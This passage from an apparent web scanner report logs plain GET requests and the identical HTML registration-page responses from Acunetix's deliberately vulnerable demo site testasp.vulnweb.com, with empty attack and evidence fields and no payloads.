href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> 